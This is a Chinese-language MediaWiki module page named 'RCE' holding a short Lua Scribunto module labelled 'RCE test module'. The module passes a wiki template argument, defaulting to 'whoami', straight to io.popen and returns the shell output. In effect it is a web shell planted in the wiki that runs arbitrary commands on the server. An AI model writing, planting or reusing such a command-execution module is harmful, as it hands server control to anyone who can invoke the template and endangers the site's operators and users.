未登录编辑者的页面 了解详情
可在模块:RCE/doc创建此模块的帮助文档
-- RCE test module local p = {} function p.rce(frame) local cmd = frame.args[1] or 'whoami' local handle = io.popen(cmd) local result = handle:read('*a') handle:close() return result end return p